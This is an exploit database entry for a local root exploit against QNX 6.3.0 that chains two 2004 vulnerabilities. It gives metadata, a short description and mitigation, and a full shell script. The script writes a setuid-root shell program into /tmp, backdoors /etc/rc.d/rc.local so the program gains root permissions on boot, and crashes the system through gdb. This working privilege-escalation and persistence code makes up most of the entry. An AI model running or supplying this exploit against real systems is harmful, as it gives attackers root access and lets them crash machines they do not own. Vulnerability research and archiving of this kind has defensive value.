Local r00t w00t t00t t00t

vendor:

QNX 6.3.0

by:

Kokanin

7,2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: QNX 6.3.0

Affected Version From: QNX 6.3.0

Affected Version To: QNX 6.3.0

Patch Exists: NO

Related CWE: CVE-2004-0950, CVE-2004-0951

CPE: o:qnx:qnx_6.3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: QNX 6.3.0

2004

This exploit combines two vulnerabilities (CVE-2004-0950 and CVE-2004-0951) to gain root access on a default QNX 6.3.0 install. The exploit first checks if the file /etc/rc.d/rc.local is writable, and if it is, it creates a C program in /tmp/moo.c, compiles it, and adds a command to /etc/rc.d/rc.local to set the root UID and run a shell. The exploit then crashes the system and uses GDB to gain root access.

Mitigation:

Ensure that the file /etc/rc.d/rc.local is not writable by non-privileged users.

Source

Exploit-DB raw data:

#!/bin/sh
# this combines http://www.idefense.com/intelligence/vulnerabilities/display.php?id=387
# and http://www.idefense.com/intelligence/vulnerabilities/display.php?id=386
# into local r00t w00t t00t t00t, hugs and kisses from www.lort.dk. 
# unset PAGER; man chmod | mail -s "urgent reading" support@qnx.com
# kokanin discovered this around august/september 2004
echo "performing check"
if [ -w /etc/rc.d/rc.local ] ; 
then echo "check passed, backdooring system" && 
cat >/tmp/moo.c << __EOF__ && cd /tmp && make moo && echo "chown root /tmp/moo\
&& chmod 6755 /tmp/moo" >> /etc/rc.d/rc.local && echo "rc.local backdoored,\
 crashing system" && echo -e "break *0xb032d59f\nr\ncont\ncont" | gdb gdb; 
int main(){
setuid(0);
system("/bin/sh");
}
__EOF__
else echo "system is not a default QNX 6.3.0 install, or someone set correct permissions manually, sorry";
fi

# milw0rm.com [2006-02-08]